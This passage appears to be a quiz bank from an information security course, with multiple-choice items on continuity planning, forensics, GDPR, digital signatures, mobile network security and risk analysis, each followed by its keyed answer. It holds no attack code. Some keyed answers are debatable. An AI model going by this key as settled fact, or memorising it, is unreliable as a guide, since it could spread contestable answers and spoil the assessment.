Apply automatic attack tools.
Apply automatic attack tools.
Business continuity plan together with disaster recovery plan
are a set of plans for preventing disasters.
are the set of adequate preparations and procedures for the continuation of all organization functions.
are a standard set of preparations and procedures for responding to a disaster without the need of being approved.
are a sufficient and previously approved set of preparations and procedures for responding to a disaster.
are the set of adequate preparations and procedures for the continuation of all organization functions.
When dealing with digital evidence, the chain of custody must
never be altered.
be completely reproducible in a court of law
exist in only one location.
be compiled according to a documented process.
be compiled according to a documented process.
In an organization both disaster recovery and business continuity need a plan, and when information security is concerned the term disaster recovery commonly refers to the recovery of technology environment. manufacturing environment. personnel environments. organization operations.
technology environment.
Even if a Finnish company wants to be silent about a breach, it may have obligations to report it to
CERT Coordination Center.
anonymous police reporting service.
Finnish Communications Regulatory Authority.
the EU Information Security Agency.
Finnish Communications Regulatory Authority.
Computer forensics can be regarded as a combination of computer science, information technology, engineering and hacker's mindset. critical thinking. the scientific method. law.
law.
To ensure proper forensic action when needed, an incident response team must
avoid conflicts of interest by ensuring that the legal counsel of the organization is not part of the process.
routinely create forensic images of all desktops and servers.
only promote closed incidents to law enforcement.
treat every incident as though it may be a crime.
treat every incident as though it may be a crime.
GDPR defines the concept of data subject as a person who can be identified by reference to an identifier such as a name, ..., "or to one or more factors specific to the physical, physiological, genetic, ______ , economic, cultural or social identity of that natural person." gender medical mental ethnic
mental
Which of the following is furthest from the main role of the company’s data protection officer?
management of access rights
processing of consents to collecting data
supervision of log data
implementing physical access control
implementing physical access control
There is legislation to promote information security. It is possible to violate it even if you don’t do or have not done anything unauthorized actively. Whom can this affect?
The owner of the information when the information is illegal.
An organization that neglects to take care of information security.
A private person on whose computer a bot agent is sending spam.
A government official who intends to disclose confidential material.
An organization that neglects to take care of information security.
A digital signature improves the handwritten signature in many ways, but it does not increase
assurance on the signed content not having been altered.
trust on the time when the signature was made.
assurance on the identity of the signer.
the number of people who can get assured of its validity.
trust on the time when the signature was made.
A digital signature is not legally valid, even if it has been technically verified, if
a signatory declares that he has done so in error.
a new signature subsequently revokes it.
the signed electronic information has been altered.
the signatory no longer has the instrument he used to make the signature.
the signed electronic information has been altered.
The issuer of the Citizen certificate, for instance on the Finnish identity card, must comply with the Certificate Policy,
the details of which are trade secrets.
which is a public document drawn up by the issuer.
which is part of Finnish legislation.
which is not part of the law but is common to all issuers of the Citizen certificates.
which is a public document drawn up by the issuer.
Two complementary viewpoints in information security are: (i) people can be protected from information or (ii) information from people. Which among the following is the most common example of (ii)?
Unprotected and unrestricted information would block telecommunication networks.
Information that is freely available elsewhere is not wanted somewhere in the world.
Information may become unreliable if accessed by too many.
One does not want to give access to the information for free.
One does not want to give access to the information for free.
Two complementary viewpoints in information security are: (i) people can be protected from information or (ii) information from people. Which among the following is the most common example of (i)?
Unsolicited bulk email is effectively filtered at several stages between the senders and receivers.
Information that is freely available elsewhere is not wanted somewhere in the world.
Information may become harmfully unreliable if modified by too many.
Big web shops like Amazon have effective recommendation mechanisms that filter out most uninteresting items.
Unsolicited bulk email is effectively filtered at several stages between the senders and receivers.
None of the following is a comprehensive definition of e-commerce. What is the most comprehensive?
Money is transferred in bits.
Products are digital.
Trading takes place automatically without human interaction.
The trading parties meet mainly in a way other than face to face or through paperwork.
The trading parties meet mainly in a way other than face to face or through paperwork.
What is a mule, when used in relation to information security?
Malware, where an exceptionally high proportion of the code is carrying the harmful payload.
A person assisting in money laundering, perhaps without realizing it himself.
The server in ransomware botnets, that is handling the payments.
A person, knowingly or not, carrying an implanted processor that is used for spying through a wireless connection.
A person assisting in money laundering, perhaps without realizing it himself.
If the security concerns of publishers of web pages are divided into four categories, which of the following covers them best?
availability of pages, authenticity of pages, protection of copyright, liability.
availability of pages, integrity of pages, getting proper compensation, being able to take care of responsibilities.
page authenticity, page integrity, customer authenticity, liability.
confidentiality of pages, integrity of pages, obtaining appropriate compensation, bearing responsibilities.
availability of pages, integrity of pages, getting proper compensation, being able to take care of responsibilities.
What kinds of payment systems are the Finnish Siirto, Swedish Swish and Danish MobilePay?
localized versions of an American system
credit based
insecure unless used within a VPN connection to one’s own bank.
working without the payer knowing the payee’s account number
working without the payer knowing the payee’s account number
You can have many things filled in automatically or predictively in messages that you write in various systems. In general, what should you be most wary of when using such filling facilities?
embarrassing words
passwords
obscene smileys or emojis
names of unrelated persons
passwords
In your new IoT gadget, i.e. in the appliance that joins the Internet of Things, what is the most likely weakness with respect to information security?
A spy module set up by the importer based on regulations of the Finnish authorities.
Default password that you didn’t change.
Unfiltered power cord that allows easy side channel attacks.
The connection to a server network that collects not only statistics but personal usage data.
Default password that you didn’t change.
If you want to have a wireless dashboard for your electric sockets and lamp switches at home, you might end up letting outsiders interfere with your appliances. Which connection is the best in this respect?
Wifi
ZigBee
Bluetooth
NFC (Near field communication)
ZigBee
Imagine a near-future situation where you carry a common neuroimplant that interacts with your consciousness, but is also connected to the outside world by itself. What is the most likely weakness with respect to information security?
An attacker may find a backdoor in the software and start affecting the way you think.
The gadget may fail to improve the quality of your life in the intended way.
If one of its tasks is to ration out medicine, an attacker may cause a DoS to this function by simply overloading the communication channel with traffic.
The connection may leak personal information to false receivers or through security holes in the supporting information system.
The connection may leak personal information to false receivers or through security holes in the supporting information system.
A job announcement for professor in Cyber security (Oulu 2020) outlines the research problem area this way: “Traditional thinking in system development may have considered trust as an afterthought: data is processed by various devices and actors in the system, supply chain is long and complicated, _______ and trust and privacy is upheld by either attempting to anonymize the data or applying strong access controls.” What belongs to the slot?
regulations are poorly understood
data persist forever
cryptographic protections are frequently broken
customers demand open-access data
data persist forever
A job announcement for professor in Cyber security (Oulu 2020) outlines the research field in this way: "Traditional thinking in system development may have considered trust as an afterthought: ... ... Opposite thinking would be to focus data collection, keeping data and its processing _______, simplifying and securing each step in processing and expiring collected data as swiftly as possible." What belongs to the slot?
encrypted
public
local
distributed
local
What does it mean in terms of usability, if one of the goals in the design of a secure system is to make abuse really difficult?
The system will not be optimal with respect to other security goals.
The goal has very little to do with usability.
It is likely that usability for allowed use is not impaired, and good user-experience improves the opportunity for success in the security design.
The system is likely to become unusable.
It is likely that usability for allowed use is not impaired, and good user-experience improves the opportunity for success in the security design.
Your browser displays a page and navigates to a new page without using a link on the original page (that is, you enter an address or use a bookmark). In this case, a different server that has the new page does not know which page you came from. What else does the server not know in this case?
Your machine’s or proxy’s IP address.
The cookie it sent during your previous visit.
Your email address.
Whether your browser can display JPEG images.
Your email address.
All of the following are related to ethical hacking, but which one makes it actually ethical?
Agreement with the target.
Adherence to its purpose by the hacker.
Supervision by a representative of the target organization.
Education and skill
Adherence to its purpose by the hacker.
You receive an email with an attachment from a person that you know. The email is digitally signed but your email client cannot verify the signature. What is the best course of action?
Determine why the signature cannot be verified before opening the attachment.
Delete the email.
Forward the email to another address with a new signature.
Open the attachment to determine if the signature is valid.
Determine why the signature cannot be verified before opening the attachment.
There are several ways in which an attacker can make money from your misspelling a URL. Many kinds of phishing and malware are some of those ways, but which is not a way?
Through a botnet she collects statistics on misspellings of popular sites and their pages, and sells these data to the site owners.
Advertising revenue from ads on the pages with the misspelled URL, owned by the attacker.
The attacker owns the misspelled URL and sells but doesn’t deliver to you something you thought you were buying at the correct URL.
The attacker redirects traffic from his misspelled URL to the correct site through a real affiliate site, and earns a commission for each real purchase. (The correct site pays to its affiliate, who pays to the attacker - or is the attacker.)
Through a botnet she collects statistics on misspellings of popular sites and their pages, and sells these data to the site owners.
Assume your cell phone stays strictly in your possession while you face an attacker well versed in 4G/5G technology, who gets to know some data concerning your phone. Which of the following revelations would most easily lead him to be able to make calls on your bill?
The secret shared between your telephone network and your SIM card
Your phone number and IMSI (International Mobile Subscriber Identity)
The key used to encrypt your call.
Your phone number and IMEI (International Mobile Equipment Identity)
The secret shared between your telephone network and your SIM card
Which of the following has the least to do with ordinary cell phone calls?
key management
antivirus
security policy
authentication
antivirus
Which of the following applies to 4G and 5G mobile phone systems? Here “the phone is authenticated” means that its SIM / USIM is authenticated.
In 5G, the phone network is authenticated to the phone, but not in 4G.
In both, the phone is authenticated to the phone network.
The phone is authenticated to the phone network in 5G, but not in 4G.
The phone is authenticated in 5G to the receiving 5G phone, but the same does not happen in 4G.
In both, the phone is authenticated to the phone network.
Which of the following applies to 4G and 5G mobile phone systems?
The call is encrypted end to end between two 5G phones, while in 4G the call is decrypted and re-encrypted in the exchanges.
The call is encrypted end-to-end between two 5G phones, while in 4G the encryption is only between the device and the base station.
Both 4G and 5G calls have encryption, but neither of them extends from end to end.
The call is encrypted in 5G but not in 4G.
Both 4G and 5G calls have encryption, but neither of them extends from end to end.
Which of the following does not apply?
Spyware can be part of an employee’s computer installation based on the employment contract.
Restricting browser-run scripts reduces the chances of spyware running.
Only government authorities have the right to find out what someone is doing or has done in the past on their computer.
Spyware that tracks user activity usually uses information sources other than the log files on the user’s machine.
Only government authorities have the right to find out what someone is doing or has done in the past on their computer.
Assume that according to a company’s new security policy, workstations may only handle work matters and all communications (including work-related) and personal use must be handled through computers in a separate room. Then, in accordance with the policy and co-operation procedure, spyware is installed on employees’ workstations, which records keyboard and pointing device operations. What is the most likely consequence?
The security of the company will be improved but only if the employees believe that the recorded data will also be monitored.
Employee privacy will be violated if the recorded data is also monitored.
The security of the company is deteriorating as employees continue to take care of personal matters at their work desks using their own equipment.
The extra load greatly reduces the efficiency of the workstation.
The security of the company will be improved but only if the employees believe that the recorded data will also be monitored.
Adware has started to mean advertising-supported software and it is very common in smart phones. An earlier meaning of the word adware, and a still valid concept, is
software that installs itself without the user’s knowledge and displays ads while the user browses the Internet.
an invisible element on a web page, revealing user’s presence on that page to its home site.
visualization of the source sites of web page elements.
software for augmented awareness, for instance of security threats.
software that installs itself without the user’s knowledge and displays ads while the user browses the Internet.
Information security policy is a management-approved view of the _______ of information security.
costs, responsibilities and implementation
status, resources and ways of implementation
significance, responsibilities and implementation plan
goals, principles and implementation
goals, principles and implementation
The organization’s security policy should take a position on
when the next policy update is made.
who decides on the allocation of resources to implement the policy.
how to organize the ownership of the information systems to be secured.
who is responsible for responding to security breaches.
who is responsible for responding to security breaches.
What is the relationship between Security Policy and Security Plan? (S. Plan is also called S. Program.)
Policy contains Plan.
Plan contains Policy.
Policy is an annually updated version of Plan.
Policy is made on the basis of Plan.
Plan contains Policy.
A large organization can have several security policies (=p.), and a common way to categorize them is:
standards, guidelines, and procedures
compliance p., obligatory p., recommended p.
program p., issue-specific policy, system-specific p.
internet p., data-protection p., acceptable-use p.
program p., issue-specific policy, system-specific p.
What is the correct order when building security?
security mechanisms - threat survey - security policy - risk analysis
security policy - threat survey - risk analysis - security mechanisms
threat survey - risk analysis - security policy - security mechanisms
security policy - security mechanisms - threat survey - risk analysis
threat survey - risk analysis - security policy - security mechanisms
When outsourcing IT systems,
security services cannot be outsourced with the exception of physical security, like guards.
regulatory and compliance requirements must be passed on to the provider.
the provider can take up ownership of all devices, software and data while the outsourcing organization concentrates on physical production.
security services cannot be outsourced except auditing.
regulatory and compliance requirements must be passed on to the provider.
To deserve the attribute “effective” the security management in an enterprise must
achieve full security at the lowest cost.
prioritize security for new products and send prompt answers to questions concerning the security of old products.
reduce risk to an acceptable level.
install software and hardware updates and patches as soon as they become available.
reduce risk to an acceptable level.
The primary security goal of _______ management is to ensure that changes to the hardware, software or networking in the organization's information system do not unintentionally or unknowingly diminish security.
document
policy
user
configuration
configuration
There are two main types of information system security requirements - in general, but especially according to the Common Criteria standard, namely
functional and assuring.
emphasizing either integrity and availability, or confidentiality and privacy.
related to intentional and unintentional security breaches.
active and passive.
functional and assuring.
Which of the following is less useful as a basis when determining the value of an asset during risk analysis?
The asset’s price in an external marketplace.
The initial and outgoing costs of purchasing, licensing and supporting the asset.
The asset’s importance to the organization’s production operations.
The level of insurance required to cover the asset.
The level of insurance required to cover the asset.
Organization impact analysis
is just a different term to describe risk analysis.
calculates the probability of disruptions to the organization.
establishes the effect of disruptions on the organization.
is critical to development of a business continuity plan.
establishes the effect of disruptions on the organization.
Assume you have been contracted as a security consultant to a growing medium-sized firm, where there is still no full-time security staff. One of your tasks will be business impact analysis. Which of the following should you do before the others?
Evaluate the impact of disruptive events.
Identify all business units within the organization.
Estimate the criticality of business functions.
Determine the objectives for recovery time, i.e. the allowed down-time.
Identify all business units within the organization.
The risk analysis as part of an information security process includes identification of what is valuable. Which of the following values is most relevant for this subtask?
The replacement value of its production and office equipment.
Financial assets and liabilities.
Intangible assets.
Investments in maintaining the working capacity of staff.
Intangible assets.
Pick the correct combinations of the alternate phrases: An organization will conduct a risk assessment to evaluate (i) threats to its assets, (ii) vulnerabilities {present|possible} in the environment, (iii) the likelihood that a threat will be realized by taking advantage of an {exposure|attack}, (iv) the impact that the {exposure|attack} being realized will have on the organization, (v) countermeasures {available|in use}, (vi) {total|residual} risk.
possible - exposure - exposure - in use - residual
present - exposure - exposure - available - residual
present - exposure - exposure - in use - total
present - attack - attack - available - total
present - exposure - exposure - available - residual
When assessing the risks associated with residual data in an information system, it is important to
note that a careless user may replace an existing document with an older version.
first perform overwriting on all seemingly empty space on the storage media.
understand the security requirements of any data in the system.
evaluate vulnerabilities found in applications that handle sensitive files.
understand the security requirements of any data in the system.
What is characteristic of qualitative risk assessment?
Difficulty of implementation unless you are very experienced with the risk assessment process.
Ease of implementation and possibility to complete by personnel that has only limited understanding of the risk assessment process.
Ease of implementation by partly automated and reasonably detailed metrics for calculation of risk.
Possibility to complete by inexperienced personnel by using laborious but detailed metrics for calculation of risk.
Ease of implementation and possibility to complete by personnel that has only limited understanding of the risk assessment process.
Escrow is a useful concept in many contexts, but what cannot be escrowed?
money
public key certificates
decryption keys
software source code
public key certificates